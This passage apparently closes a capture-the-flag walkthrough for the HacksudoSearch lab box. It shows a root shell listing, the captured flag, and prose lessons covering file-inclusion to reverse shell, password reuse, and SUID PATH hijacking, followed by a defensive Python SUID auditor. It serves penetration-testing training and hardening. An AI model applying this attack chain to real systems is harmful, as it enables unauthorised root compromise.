drwx------ 7 root root 4.0K Apr 15 2021 .
drwxr-xr-x 18 root root 4.0K Apr 11 2021 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 13 2021 .cache
drwx------ 3 root root 4.0K Apr 13 2021 .config
drwx------ 3 root root 4.0K Apr 13 2021 .gnupg
drwxr-xr-x 3 root root 4.0K Apr 11 2021 .local
-rw------- 1 root root 496 Apr 13 2021 .mysql_history
-rw-r----- 1 root root 1.7K Apr 15 2021 notes.txt
drwxr-xr-x 4 root root 4.0K Apr 13 2021 .npm
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r----- 1 root root 488 Apr 15 2021 root.txt
-rw-r--r-- 1 root root 218 Apr 12 2021 .wget-hsts
root@HacksudoSearch:/root# cat root.txt
cat root.txt
_ _ _ ____ _
| |__ __ _ ___| | _____ _ _ __| | ___ / ___| ___ __ _ _ __ ___| |__
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ \___ \ / _ \/ _` | '__/ __| '_ \
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | ___) | __/ (_| | | | (__| | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ |____/ \___|\__,_|_| \___|_| |_|
You Successfully Hackudo search box
rooted!!!
flag={9fb4c0afce26929041427c935c6e0879}
root@HacksudoSearch:/root#
Lessons learned
- After confirming that the target has a local file inclusion vulnerability, check for SSH private key files; if there are none, check whether remote file inclusion is also possible.
- If the target has a remote file inclusion vulnerability, start a web server on Kali Linux with Python's http.server module, place a shell.php there (a common PHP reverse shell script), then request it through the inclusion to get a reverse shell.
- This target is a bit nasty: it appeared that one user's (hacksudo) password had been cracked, but that password was not the real one; the real one was the database password. The lesson is that every piece of password information obtained is valuable and should be tried one by one.
- For local privilege escalation, first use find to locate executables with the SUID bit. On this box it is a custom binary, and there is no need for strings or similar: reading its source shows it executes a file (install) by name, so we can create a file with that name that actually runs /bin/bash and modify the PATH environment variable to get root.
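The SUID lesson has a direct defensive counterpart: inventory setuid binaries, diff them against a known baseline, and treat any setuid file under a user-writable tree (such as /home/hacksudo/search/tools/searchinstall) as a finding. The following Python auditor is an added example, not part of the walkthrough; the find output is embedded as constructed input, and DEBIAN10_BASELINE is an assumed baseline that should be rebuilt from a clean image of the release you actually run.

```python
import os
import stat

# The SUID inventory printed by `find / -perm -4000 -type f` in this
# walkthrough, embedded here as constructed sample input.
FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/home/hacksudo/search/tools/searchinstall
"""

# Assumed baseline of setuid binaries on a stock Debian 10 install; regenerate
# it from a clean image of the same release before relying on it.
DEBIAN10_BASELINE = {
    '/usr/bin/passwd', '/usr/bin/gpasswd', '/usr/bin/pkexec', '/usr/bin/chfn',
    '/usr/bin/umount', '/usr/bin/mount', '/usr/bin/newgrp', '/usr/bin/chsh',
    '/usr/bin/su', '/usr/bin/sudo', '/usr/lib/openssh/ssh-keysign',
    '/usr/lib/eject/dmcrypt-get-device',
    '/usr/lib/policykit-1/polkit-agent-helper-1',
    '/usr/lib/dbus-1.0/dbus-daemon-launch-helper',
}
# Trees where a setuid binary is never expected: users can write there.
UNTRUSTED_PREFIXES = ('/home/', '/tmp/', '/var/tmp/', '/dev/shm/')


def collect_suid(root='/'):
    """Walk the filesystem and return regular files with the setuid bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def audit_suid(paths, baseline=DEBIAN10_BASELINE):
    """Return (path, reason) pairs for setuid binaries that deserve review."""
    findings = []
    for path in paths:
        path = path.strip()
        if not path:
            continue
        if path.startswith(UNTRUSTED_PREFIXES):
            findings.append((path, 'setuid file under a user-writable tree'))
        elif path not in baseline:
            findings.append((path, 'not in the distribution baseline'))
    return findings


def writable_path_dirs(path_env=None):
    """PATH entries the current user can write to: each one lets a relative
    command name, like the system("install") in searchinstall.c, be hijacked."""
    path_env = os.environ.get('PATH', '') if path_env is None else path_env
    return [d for d in path_env.split(':') if d and os.access(d, os.W_OK)]
```

On a live host, `audit_suid(collect_suid())` produces the same report from the real filesystem, and a privileged binary that must run a helper should call it by absolute path with a sanitised environment rather than through PATH.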